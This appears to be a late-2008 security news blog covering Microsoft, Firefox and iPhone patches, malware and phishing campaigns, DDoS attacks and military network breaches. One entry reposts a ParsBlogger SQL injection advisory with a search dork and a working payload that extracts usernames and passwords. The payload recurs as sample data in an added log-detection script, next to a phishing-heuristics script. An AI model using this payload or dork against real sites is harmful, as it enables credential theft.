Microsoft released today patches for at least 28 vulnerabilities affecting Windows, Office, Internet Explorer, Visual Basic ActiveX controls and Windows Media Player. According to a warning from security researchers, malicious hackers are exploiting an unpatched zero-day flaw in Microsoft’s Internet Explorer 7 browser to launch a new wave of malware attacks.
Of the 28 flaws, 23 could be used to launch remote code execution attacks with minimal user action. Most of the bulletins address client-side flaws that could be exploited via the browser or when a user opens a booby-trapped file, for example a rigged RTF (Rich Text Format) Word file.
Here are the details and overview of the December 2008 Microsoft patches:
MS08-070 (Critical) Multiple vulnerabilities in ActiveX controls from the Visual Basic 6.0 runtime allow arbitrary code execution. Also affects Visual Studio, FoxPro, FrontPage, and MS Project. The vulnerable files are distributed with 3rd party applications as well. Affected: Visual Basic ActiveX (CVE-2008-3704, CVE-2008-4252, CVE-2008-4256, CVE-2008-4253, CVE-2008-4254, CVE-2008-4255). Exploit code for CVE-2008-3704 has been publicly available since August 2008.
MS08-071 (Critical) Multiple overflow vulnerabilities allow code execution with the rights of the logged-on user via crafted WMF files. Replaces MS08-021. Affected: GDI (CVE-2008-3465, CVE-2008-2249). No publicly known exploits.
MS08-072 (Critical) A multitude of vulnerabilities allow arbitrary code execution in Office (and, by extension, Outlook). Also affects the Mac versions of Office (Office 2004 and Office 2008). Replaces MS08-026, MS08-042, MS08-052 and MS08-057. Affected: MS Word (CVE-2008-4024, CVE-2008-4025, CVE-2008-4026, CVE-2008-4027, CVE-2008-4028, CVE-2008-4030, CVE-2008-4837, CVE-2008-4031). No publicly known exploits.
MS08-073 (Critical) Multiple vulnerabilities allow arbitrary code execution with the rights of the logged-on user. Replaces MS08-058. Affected: MS Internet Explorer (CVE-2008-4258, CVE-2008-4259, CVE-2008-4261, CVE-2008-4260). No publicly known exploits.
MS08-074 (Critical) Multiple vulnerabilities allow arbitrary code execution in MS Office. Also affects the Mac versions of Office (Office 2004 and Office 2008). Replaces MS08-058. Affected: Excel (CVE-2008-4265, CVE-2008-4264, CVE-2008-4266). No publicly known exploits.
MS08-075 (Critical) Multiple vulnerabilities allow arbitrary code execution with the rights of the logged-on user. Replaces MS08-038. Affected: Windows Explorer (CVE-2008-4269, CVE-2008-4268). No publicly known exploits.
MS08-076 (Important) Multiple vulnerabilities allow arbitrary code execution with the rights of the logged-on user. Affected: WMC media player (CVE-2008-3010, CVE-2008-3009). No publicly known exploits.
MS08-077 (Important) Bypassing authentication is possible on SharePoint servers. Replaces MS07-059. Affected: SharePoint (CVE-2008-4032). Microsoft’s workaround publishes more details here.
Users running IE 7 on Windows XP SP2 can still be infected by a Trojan downloader that exploits an unpatched IE7 vulnerability. The exploit was published the same day Microsoft patched the wide range of vulnerabilities mentioned above. The bug lies in the way IE handles XML (Extensible Markup Language). For the attack to work, a victim must first visit a Web site that serves the malicious JavaScript code taking advantage of the flaw.
In attacks, the code drops a malicious program on the victim’s PC which then goes to download malicious software from various locations. Currently there is public proof-of-concept code and the attacks may become more widespread (some hacked Chinese-language websites already infect visitors).
10.12.08
Unpatched Internet Explorer 7 Vulnerability Exploited As Microsoft Patch Fixes 28 Security Vulnerabilities
7.12.08
Login And Password Stealing Trojan Masquerades As Firefox Plug-in
It drops an executable file (which is a Firefox 3 add-on) and a JavaScript file (detected by BitDefender as Trojan.PWS.ChromeInject.A) into the Firefox plugins and chrome folders respectively. It filters the URLs opened within the Mozilla Firefox browser and, whenever it encounters one of the specific addresses, captures the login credentials. It is the first malware that targets Firefox. The filtering is done by a JavaScript file running in Firefox’s chrome environment.
The backdoor code looks for data exchanged between a compromised machine and a list of pre-programmed banking sites in Europe, Australia and the US. Harvested login credentials are captured and subsequently posted to a server located in Russia.
BitDefender reports that incidents of the malware are “very low”, so the attack is more notable for its novelty than its potency. Malware that capitalises on the popularity of Firefox is rare, but not unprecedented.
4.12.08
Military US Base Systems In Afghanistan And Iraq Hit By A Virus, At Least One Classified Network Penetrated
Defense officials would not describe the extent of damage inflicted on military networks. But they said that the attack struck hard at networks within U.S. Central Command, the headquarters that oversees U.S. involvement in Iraq and Afghanistan, and affected computers in combat zones. The attack also penetrated at least one highly protected classified network.
Military computers are regularly beset by outside hackers, computer viruses and worms. But defense officials said the most recent attack involved an intrusive piece of malicious software, or “malware,” apparently designed specifically to target military networks. The invasive software, known as agent.btz, has circulated among nongovernmental U.S. computers for months. But only recently has it affected the Pentagon’s networks. It is not clear whether the version responsible for the cyber-intrusion of classified networks is the same as the one affecting other computer systems.
The malware is able to spread to any flash drive plugged into an infected computer. The risk of spreading the malware to other networks prompted the military to ban the drives.
Although officials are withholding many details, the attack underscores the increasing danger and potential significance of computer warfare, which defense experts say could one day be used by combatants to undermine even a militarily superior adversary.
Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement. Defense experts may never be able to answer such questions, officials said.
Suspicions of Russian involvement come at an especially delicate time because of sagging relations between Washington and Moscow and growing tension over U.S. plans to develop a missile defense system in Eastern Europe. The two governments also have traded charges of regional meddling after U.S. support for democratic elections in former Soviet states and recent Russian overtures in Latin America.
The offending program has been cleansed from a number of military networks. But officials said they did not believe they had removed every bit of infection from all Defense Department computers.
29.11.08
Malware attacks decline from the US, but increase from China, Russia and Korea
Thirty-five percent of all Internet intrusion attacks are coming from Korea, according to Network Box. Analysis of all Internet threats in November by the company shows that Korea accounts for more than double the intrusions of its nearest competitor, the US (14 per cent). Spam and viruses are on the decline from the US, following the shutdown of the McColo spam hosting service earlier this month. Although over the full month the US was the biggest source of spam and viruses, this dropped sharply towards the end of November, when China took the top spot in the spam charts.
Top Ten Viruses
Threat Name Daily Average %
1. spam.phish.url 35.67821
2. can-2003-0161 14.69491
3. trojan-spy.html.fraud.gen 5.30703
4. trojan-dropper.win32.agent.yzp 4.05881
5. nbh-bscript 3.16169
6. spam.porn.spam_nb_porn_subj_csk_1 2.50091
7. nbh-multext 2.35456
8. policy_prohibits_'exe'_nested_at 1.79322
9. trojan-psw.win32.agent.lcc 1.78064
10. clm.html.phishing.pay-36 1.31201
Top Ten Trojans
Threat Name Daily Average %
1. trojan-spy.html.fraud.gen 0.11455
2. trojan-dropper.win32.agent.yzp 0.09805
3. trojan-psw.win32.agent.lcc 0.05511
4. trojan-spy.win32.zbot.fql 0.03281
5. trojan-spy.win32.zbot.frh 0.02655
6. clm.trojan.agent-61609 0.01474
7. trojan.win32.agent.amzt 0.01355
8. trojan-downloader.win32.small.afzf 0.00847
9. trojan-spy.win32.zbot.ghq 0.00711
10. trojan-downloader.win32.agent.anaq 0.00636
Top Ten Intrusions
Threat Name Daily Average %
1. NETBIOS 35.61600
2. BOGON 13.72736
3. PINGFLOOD 7.14538
4. HTTP-S-WEBDAV 0.03116
5. ICMP 0.02818
6. HTTP-S-WEBDEX 0.01964
7. SOBIG-F 0.01383
8. HTTP-S-NIMDA 0.00477
9. HTTP-S-UNIXATTACK 0.00439
10. HTTP-S-IISATTACK 0.00378
Top Ten Sources of Viruses
Country Daily Average %
1. US 19.49704
2. China 6.49728
3. Korea 6.36452
4. Australia 5.46776
5. UK 4.40333
6. Ukraine 4.39740
7. Turkey 3.88654
8. Russia 3.60779
9. Brazil 3.42233
10. Spain 2.77787
Top Ten Sources of Spam
Country Daily Average %
1. US 14.43738
2. China 9.99901
3. Korea 6.67193
4. Turkey 6.31428
5. Australia 5.94338
6. UK 4.46450
7. Brazil 4.19417
8. Spain 4.10385
9. Russia 3.83448
10. Poland 2.77324
Top Ten Sources of Intrusions
Country Daily Average %
1. Korea 34.90125
2. US 15.97265
3. Hong Kong 8.88417
4. China 8.45910
5. Malaysia 5.59282
6. Australia 3.90484
7. Turkey 1.46664
8. Brazil 1.15039
9. UK 1.00705
10. Poland 0.95489
Paypal Is Being Used In Popular Nigerian 419 Scam
A new variant of the popular Nigerian 419 scam is possible via PayPal, according to a report by the Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code and the premise is always the same: somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering, but this latest twist – using PayPal – is significant because, on the surface, it looks like there’s no catch.
Instead of receiving the offer via email (as is normally the case), this person was approached over a Skype chat session. The perpetrator wanted to transfer funds out of a PayPal account and convert them back into US dollars. All the victim needed to do was check his PayPal account and, when the money arrived, send a significantly lower amount back via Western Union.
Due to PayPal’s payment reversal policy, there is a loophole which enables the scam to work. As the payment would be classified as ‘services’ rather than goods, there would be no proof that the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and then finds himself stuck with no means of recourse.
Both Western Union and PayPal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously, while PayPal’s dispute resolution procedure is a crude automated system.
28.11.08
Parsblogger Remote SQL Injection
--------------------------------------------------------------------------------
[~] Script : ParsBlogger
[~] Version : >!<
[~] Link : http://www.parsblogger.com/
[~] Dork : "Powered by ParsBlogger"
[~] Author : BorN To K!LL
[~] TeaM : Security Geeks [ Sec-Geeks.com ]
--------------------------------------------------------------------------------
[~] Exploit :.site.ir/blog.asp?wr=[SQL]
[~] Example :.site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--
--------------------------------------------------------------------------------
[~] Greetings :.[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
--------------------------------------------------------------------------------
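As an added defensive example (not part of the advisory above and not ParsBlogger's own code), the following Python script hunts for UNION-based injection probes of the kind shown, by URL-decoding the query strings in IIS W3C log lines and matching the union/select sequence; the log lines, field layout and client IP addresses are constructed for the example.

```python
"""Detect UNION-based SQL injection probes in IIS W3C log lines.

Added example for the ParsBlogger advisory; the sample log below is
constructed, not captured from a real server.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# A UNION ... SELECT sequence (optionally UNION ALL) is the hallmark of the
# probe shown in the advisory; match it case-insensitively on word boundaries.
_UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.IGNORECASE)


def normalise_query(query: str) -> str:
    """URL-decode twice (to unwrap double-encoded probes) and collapse spaces.

    '+' and '%20' both become a single space, so 'union+all+select',
    'union%20all%20select' and 'union%2520all%2520select' all compare equal.
    """
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).strip()


def is_sqli_probe(query: str) -> bool:
    """True when the decoded query string carries a UNION ... SELECT clause."""
    return _UNION_SELECT.search(normalise_query(query)) is not None


def parse_iis_line(line: str):
    """Parse a W3C line with the constructed field order:
    date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status.
    Returns None for directives (#...) and short/garbled lines.
    """
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 8:
        return None
    return {
        "date": parts[0],
        "time": parts[1],
        "method": parts[3],
        "stem": parts[4],
        "query": parts[5],   # IIS logs '-' when there is no query string
        "client": parts[6],
        "status": parts[7],
    }


def find_sqli_attempts(log_text: str):
    """Return one record per request whose query string looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None or rec["query"] == "-":
            continue
        if is_sqli_probe(rec["query"]):
            rec["decoded_query"] = normalise_query(rec["query"])
            hits.append(rec)
    return hits


def summarise_by_client(hits) -> dict:
    """Count probes per client address; repeat offenders go to the block list."""
    return dict(Counter(h["client"] for h in hits))


# Constructed log excerpt: one normal request, the advisory's probe,
# a percent-encoded variant, and a request with no query string.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-11-28 10:01:02 10.0.0.5 GET /blog.asp wr=5 203.0.113.7 200
2008-11-28 10:01:09 10.0.0.5 GET /blog.asp wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer-- 203.0.113.7 200
2008-11-28 10:02:15 10.0.0.5 GET /blog.asp wr=7%20UNION%20SELECT%20null 198.51.100.9 500
2008-11-28 10:03:00 10.0.0.5 GET /index.asp - 192.0.2.4 200
"""

if __name__ == "__main__":
    for hit in find_sqli_attempts(SAMPLE_LOG):
        print(f'{hit["date"]} {hit["time"]} {hit["client"]} -> {hit["stem"]}?{hit["decoded_query"]}')
    print(summarise_by_client(find_sqli_attempts(SAMPLE_LOG)))
```

The same matcher can be run over a web application firewall's request log; the decode step matters because the advisory's `+`-separated payload and a `%20`-encoded one are the same query once the server has decoded them.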
Infecting Christmas E-greetings Are Distributed Via Spam
Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.
The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.
Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.
Example of malicious email:
Malware Infected Spam Threatens To Suspend Internet Access
Spammers are constantly using simple social engineering tactics that scare people into opening malicious files. This is definitely not the first time, and it seems this method is rather successful. TrendLabs reports a new form of spam email containing a malicious file attachment that has been spreading over the Internet. This time the subject is “Your internet access is going to get suspended”. The spam email claims to come from an ICS Monitoring Team, telling recipients that they have to stop their illegal downloading of copyrighted material or else their Internet access will be suspended.
The spam email claims that a report of the recipient’s activities for the past six months is in the attached zipped file. Apparently, instead of the said report, the zipped file contains a malicious executable file named user-EA49943X-activities.exe.
The malicious file is currently detected as TROJ_MEREDROP.GJ by TrendLabs. It drops two files, both GOLDUN variants. These Trojans are known information stealers that monitor the Internet browsing activities of affected users. In this particular case the cyber-criminals intend to steal credentials related to the online banking site www.e-gold.com.
This is not the first time malware authors have disguised themselves as the ‘Internet police’. Trend Micro researchers had already found spam that presented users with the same ‘ISP Consorcium’ spiel used in this campaign.
22.11.08
Top 5 Free Hacking Programs
Netcat
Netcat is a featured networking utility which reads and writes data across network connections using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
Pentagon Hit by Unprecedented Cyber Attack
The attack came in the form of a global virus or worm that is spreading rapidly throughout a number of military networks.
"We have detected a global virus for which there has been alerts, and we have seen some of this on our networks," a Pentagon official told FOX News. "We are now taking steps to mitigate the virus."
The official could not reveal the source of the attack because that information remains classified.
"Daily there are millions of scans of the GIG, but for security reasons we don't discuss the number of actual intrusions or attempts, or discuss specific measures commanders in the field may be taking to protect and defend our networks," the department said in an official statement.
Military computers are often referred to as part of the Global Information Grid, or GIG, a system composed of 17 million computers, many of which house classified or sensitive information.
FOX News obtained a copy of one memo sent out last week to an Army division within the Pentagon warning of the cyber attack.
"Due to the presence of commercial malware, CDR USSTRATCOM has banned the use of removable media (thumb drives, CDRs/DVDRs, floppy disks) on all DoD networks and computers effective immediately."
12 Security Vulnerabilities Fixed In Apple iPhone OS 2.2 Update
The updates include:
CVE-2008-2321: CoreGraphics contains memory corruption issues in the processing of arguments. Passing untrusted input to CoreGraphics via an application, such as a web browser, may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-2327: Multiple uninitialized memory access issues exist in libTIFF’s handling of LZW-encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-1586: A memory exhaustion issue exists in the handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected device reset.
CVE-2008-4227: The encryption level for PPTP VPN connections may revert to a previous lower setting. This update addresses the issue by properly setting the encryption preferences.
CVE-2008-4211: An issue in Office Viewer’s handling of columns in Microsoft Excel files may result in an out-of-bounds memory access. Viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4228: iPhone provides the ability to make an emergency call when locked. Currently, an emergency call may be placed to any number. A person with physical access to an iPhone may take advantage of this feature to place arbitrary calls which are charged to the iPhone owner.
CVE-2008-4229: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. A race condition in the handling of device settings may cause the Passcode Lock to be removed when the device is restored from backup. This may allow a person with physical access to the device to launch applications without the passcode.
CVE-2008-4230: If an SMS message arrives while the emergency call screen is visible, the entire SMS message is displayed, even if the “Show SMS Preview” preference was set to “OFF”. This update addresses the issue by, in this situation, displaying only a notification that a SMS message has arrived, and not its content.
CVE-2008-4231: A memory corruption issue exists in the handling of HTML table elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4232: Safari allows an iframe element to display content outside its boundaries, which may lead to user interface spoofing.
CVE-2008-4233: If an application is launched via Safari while a call approval dialog is shown, the call will be placed. This may allow a maliciously crafted website to initiate a phone call without user interaction. Additionally, under certain circumstances it may be possible for a maliciously crafted website to block the user’s ability to cancel dialing for a short period of time.
CVE-2008-3644: Disabling autocomplete on a form field may not prevent the data in the field from being stored in the browser page cache. This may lead to the disclosure of sensitive information to a person with physical access to an unlocked device.
There are still several known phishing and spamming flaws in iPhone that remain unfixed.
18.11.08
Website For The President Of Georgia Under Distributed Denial Of Service Attack
The server [62.168.168.9] which houses the website has been largely offline since the attack started. Passive DNS records show the system houses several other websites which are mostly unrelated to the Georgian government. However, the server does also host the Social Assistance and Employment State Agency website (www.saesa.gov.ge). This website along with the others on the host have been rendered inaccessible.
The C&C server involved in these attacks is on the IP address 207.10.234.244, which is located in the United States. Shadowserver recommends blocking and/or monitoring for traffic to this address. Currently it appears the hosting provider for 207.10.234.244 has taken action against this system and is now blocking access to it. However, the server being targeted by the C&C is still unreachable.
DDoS attacks against various other neighbors of Russia, including Estonia, have been quite popular in the last few years. We do not have any solid proof that the people behind this C&C server are Russian. However, the HTTP-based botnet C&C server is a MachBot controller, a tool that is frequently used by Russian bot herders. On top of that, the domain involved with this C&C server has seemingly bogus registration information but does tie back to Russia.
Update (July 22): Georgian authorities denied this attack. According to Interfax, Georgian press center claimed that the website worked without difficulties and the reports about a DDoS attack are false.
BBC Website Hit By DDoS Attack
The attack, which appears to have lasted for 1 hour and 15 minutes, the longest time the site has been offline during the whole of 2008, was also confirmed by the distributed uptime monitoring company Pingdom earlier today. During the attack, the BBC website responded very slowly, and Pingdom’s monitoring shows that for a total of 1 hour and 15 minutes it did not respond at all. The downtime was spread over multiple short intervals, lasting just a few minutes each time. The attack lasted the entire evening: it started to have an effect after 5 p.m. CET, and performance was not back to normal until after 10 p.m. CET. Analyzing the response times of the website clearly shows the effect the DDoS attack had on the performance of the BBC website.
With the lack of specific details regarding the DDoS attack provided by the BBC, the reason for this attack is unclear.
13.11.08
Firefox 3.0.4, Firefox 2.0.0.18 And Seamonkey 1.1.13 Released, 11 Security Vulnerabilities Patched, 4 Of Them Critical
The four critical vulnerabilities are:
MFSA 2008-55 Crash and remote code execution in nsFrameManager. A vulnerability in part of Mozilla’s DOM constructing code can be exploited by modifying certain properties of a file input element before it has finished initializing. When the blur method of the modified input element is called, uninitialized memory is accessed by the browser, resulting in a crash. This crash may be used by an attacker to run arbitrary code on a victim’s computer.
MFSA 2008-54 Buffer overflow in http-index-format parser. This is a flaw in the way Mozilla parses the http-index-format MIME type. By sending a specially crafted 200 header line in the HTTP index response, an attacker can cause the browser to crash and run arbitrary code on the victim’s computer.
MFSA 2008-53 XSS and JavaScript privilege escalation via session restore. The browser’s session restore feature can be used to violate the same-origin policy and run JavaScript in the context of another site. Any otherwise unexploitable crash can be used to force the user into the session restore state. This vulnerability could also be used by an attacker to run arbitrary JavaScript with chrome privileges.
MFSA 2008-52 Crashes with evidence of memory corruption. Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.
The Firefox update also fixes the following issues:
MFSA 2008-58 Parsing error in E4X default namespace.
MFSA 2008-57 -moz-binding property bypasses security checks on codebase principals.
MFSA 2008-56 nsXMLHttpRequest::NotifyEventListeners() same-origin violation.
MFSA 2008-51 file: URIs inherit chrome privileges when opened from chrome.
MFSA 2008-47 Information stealing via local shortcut files.
Mozilla recommends that users who still run FF2 upgrade to FF3 as soon as possible.
11.11.08
Introducing new vulnerability scanner
QualysGuard VM enables small to large organizations to effectively manage their vulnerabilities and maintain control over their network security with centralized reports, verified remedies, and full remediation workflow capabilities with trouble tickets. QualysGuard provides comprehensive reports on vulnerabilities including severity levels, time to fix estimates and impact on business, plus trend analysis on security issues.
By continuously and proactively .
Tenable offers the Passive Vulnerability Scanner (formerly NeVO). This paper not only serves as an introduction to passive vulnerability scanning, it also includes many examples specific to the Passive Vulnerability Scanner.
Barack Obama used for a malware spam attack
Were you to click on the link you would find yourself on a website pretending to be a news site offering information and a video of Barack Obama’s historic win. However, the site tries to fool you into installing what it claims is an update to Adobe Flash to view the video.
The file referenced is detected by Sophos as a piece of malware called Mal/Behav-027. It’s likely that the cybercriminals behind this attack will rotate the malware being served up by this dangerous website - so we will continue to monitor its activity as well as block access to the infected webpage with our web protection solutions.
9.11.08
Latest Virus Descriptions
Trojan-PSW.Win32.OnLineGames.sxa (29 Oct 2008 20:01:00 +030). This malicious program is a Trojan. It is a Windows PE EXE file. It is 118103 bytes in size. Installation: the Trojan copies its executable file to the Windows system directory: %System%\kavo.exe. In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-PSW.Win32.OnLineGames.lfi (29 Oct 2008 20:00:00 +030). This malicious program is a Trojan. It is a Windows PE EXE file. It is 123873 bytes in size. Installation: the Trojan copies its executable file to the Windows system directory: %System%\amvo.exe. In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-Downloader_Win32_Agent.nmi (29 Oct 2008 19:59:00 +030). This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. The size of infected files can range from 18KB to 47KB.
Trojan-Downloader.Win32.Braidupdate.c (28 Oct 2008 15:54:00 +030). This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. It is 79360 bytes in size. It is written in C++. Installation: in order to ensure that the Trojan is launched automatically each…
Trojan-Downloader.JS.Agent.sg (28 Oct 2008 15:52:00 +030). This Trojan downloads other files via the Internet and launches them for execution on the victim machine. It is an HTML page which contains Visual Basic Script and JavaScript. It is 677 bytes in size.
Trojan-GameThief.Win32.OnLineGames.tnys (28 Oct 2008 15:48:00 +030). This Trojan is designed to steal account data from the online game LineAge2. It is a Windows PE EXE file. It is 654848 bytes in size.
8.11.08
White House Network Hacked By Chinese On Multiple Occasions
Each attack cracked the unclassified network’s defenses for a short time. The classified network remained secure, according to the Financial Times. The official said the Chinese cyber attacks had the hallmarks of the “grain of sands” approach taken by Chinese intelligence, which involves obtaining and poring through lots of - often low-level - information to find a few nuggets.
“For a short period of time, they successfully breach a wall, and then you rebuild the wall … it is not as if they have continued access. It is constant cat and mouse on this stuff,” the source reportedly said.
The FT’s revelations came just days after Newsweek reported that both the Obama and McCain campaigns had been hacked from overseas, with large amounts of data downloaded, apparently in an attempt to track the candidates’ evolving policy positions. This could of course potentially help the unnamed foreign entities in future negotiations.
The campaign attacks were picked up by the authorities, with the FBI and the Secret Service notifying the Obama campaign back in August that what staffers thought was a virus was something more sinister.
“You have a problem way bigger than what you understand,” an FBI agent reportedly told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
The US has increased efforts to tackle cyber security, particularly since Chinese hackers believed to be associated with the People’s Liberation Army last year perpetrated a major attack on the Pentagon.
US military computer experts battled for weeks against a sustained attack that eventually overcame the Pentagon’s defenses. The cyber attackers managed to obtain information and email traffic from the unclassified computer system that supports Robert Gates, the defense secretary. Pentagon IT technicians were forced to take the network down for days to conduct repairs.
Concerns about Chinese hacking last year prompted President George W. Bush to tell reporters ahead of a meeting with President Hu Jintao of China that he might raise the issue with countries of concern.
Over the past year, the US government has tightened restrictions on officials using BlackBerrys and computers overseas, particularly in Russia and China, and sometimes bars them from removing the equipment from US government aircraft in the country.
In another incident, US government cyber investigators have determined that an attack this summer on the Obama and McCain campaign computer networks also originated in China. Details of the intrusion were first reported by Newsweek.
“There is no doubt that foreign governments are actively targeting cyber space not only for sensitive information but to influence our most sensitive processes such as the US presidential election,” said Sami Saydjari, head of the Cyber Defence Agency, a private company that advises government on hacking.
While the US has raised concerns about cyber attacks, many governments believe the US is also engaged in electronic spying. Bob Woodward, the veteran Washington Post reporter, this year revealed that the US had been spying on the Iraqi government.
Highly Critical Vulnerabilities In VLC Media Player
Exploitation of this issue requires the user to explicitly open a specially crafted file. As with any media player, the standard advice is to avoid opening files from untrusted third parties or accessing untrusted remote sites.
Details:
Summary : Buffer overflows in VLC RealText and CUE demuxers
Date : November 2008
Affected versions : VLC media player 0.9.5 down to 0.5.0
ID : VideoLAN-SA-0810
CVE reference : CVE-2008-xxxx, CVE-2008-xxxx
Solution
VLC media player 0.9.6 addresses this issue. Patches for older versions are available from the official VLC source code repository 0.9-bugfix branch.
Daily Report
7.11.08
Breaking News
Facebook “added friend confirmation” Malicious Spam
Websense Security Labs has discovered another round of malicious Facebook messages. This campaign is another visual social-engineering spam campaign which tries to visually trick users into believing that the message is a legitimate added friend confirmation. The “From” address in the message is spoofed to make it look as if it was sent from Facebook, and the links look like they lead to Facebook.
In the previous Facebook “add friend” malicious spam campaign, spammers included a malicious zip attachment that claimed to contain a picture, to entice the recipient to double-click on it. From a spammer’s perspective, the likelihood of attack success decreases when antivirus software picks up the attachment. If it is not picked up by antivirus software, then content learning technologies filter such messages and their attachments after receiving a certain volume of similar messages.
In order to maintain their attack over a longer time period with increased success rates, spammers have switched their tactics by including links to an external Web site. The use of external links in emails makes antivirus detection tougher, as not all antivirus software has the ability to scan or detect links included in email messages. Also, from a spammer’s perspective, using links consisting of compromised ‘legitimate’ domains hosting malware as a lure increases the success rate, as this is more likely to bypass security filters that rely heavily on reputation services.
Websense Security Labs sees these tactics adopted by spammers and malware authors as an ongoing trend, increasingly targeting Web 2.0 sites to carry out a wide range of attacks.
The links in the message actually lead to a malicious executable named “update.exe” (SHA1: a4dc17d1bcb191af75afedddf60aecbc2af2a37f).
This malicious executable has very low AV detection. When run, it steals data from the victim and connects to an IRC botnet.
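The two tricks described above, a spoofed From header and link text that looks like Facebook while the href points elsewhere, are both visible in the raw message. The Python below is an added example, not code from Websense or from the original page: it runs a few header and anchor heuristics over a constructed message modelled on the campaign (the sender, Return-Path, IP address and filename are made up; 198.51.100.7 is RFC 5737 documentation space). A From/Return-Path mismatch on its own is not proof of spoofing, since legitimate mailing services do the same, so treat these as scoring signals rather than a verdict.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample modelled on the campaign described above; not a real message.
SAMPLE_MSG = """\
From: "Facebook" <confirm@facebook.com>
Return-Path: <bounce@example.net>
Subject: You have added a friend
Content-Type: text/html

<p>Your friend request has been confirmed.</p>
<a href="http://198.51.100.7/update.exe">http://www.facebook.com/n/?confirm=1</a>
<a href="http://www.facebook.com/help">Help</a>
"""

ANCHOR_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
HOST_IN_TEXT_RE = re.compile(r'(?:https?://)?([\w.-]+\.[a-z]{2,})', re.I)
IPV4_RE = re.compile(r'\d{1,3}(?:\.\d{1,3}){3}')


def registered_domain(host: str) -> str:
    """Crude last-two-labels registrable domain (no public-suffix list; assumption)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def analyse(raw: str) -> list:
    """Return (finding, detail...) tuples for one raw RFC 822 message."""
    msg = message_from_string(raw)
    findings = []

    # Header check: envelope sender domain vs displayed From domain.
    _, from_addr = parseaddr(msg.get("From", ""))
    _, rp_addr = parseaddr(msg.get("Return-Path", ""))
    if from_addr and rp_addr:
        from_dom = from_addr.rsplit("@", 1)[-1]
        rp_dom = rp_addr.rsplit("@", 1)[-1]
        if registered_domain(from_dom) != registered_domain(rp_dom):
            findings.append(("from/return-path mismatch", from_dom, rp_dom))

    # Body checks: what the link shows vs where it goes, raw-IP hosts, .exe targets.
    body = msg.get_payload()
    for href, text in ANCHOR_RE.findall(body):
        parsed = urlparse(href)
        href_host = parsed.hostname or ""
        shown = HOST_IN_TEXT_RE.search(text.strip())
        if shown and registered_domain(shown.group(1)) != registered_domain(href_host):
            findings.append(("link text/href mismatch", shown.group(1), href_host))
        if IPV4_RE.fullmatch(href_host):
            findings.append(("href points at raw IP", href_host))
        if parsed.path.lower().endswith(".exe"):
            findings.append(("link to executable", href))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_MSG):
        print(finding)
```

The anchor regex is deliberately minimal; a real filter would use an HTML parser and an SPF/DKIM verdict for the sender check.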
Breaking news
According to an article published Wednesday by Newsweek, hackers broke into the computer systems of both the Barack Obama and John McCain campaigns and stole a large amount of data.
Officials with the FBI and the Secret Service notified Obama staffers in August of the breach after tech consultants for the campaign detected what they thought at the time was a computer virus. “You have a problem way bigger than what you understand,” an FBI agent told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
White House chief of staff Josh Bolten also weighed in, telling an Obama campaign chief: “You have a real problem…and you have to deal with it.”
Investigators told Obama aides that the McCain computer systems had been similarly compromised. A senior McCain official confirmed to Newsweek that the campaign’s network had been hacked and the FBI was investigating.
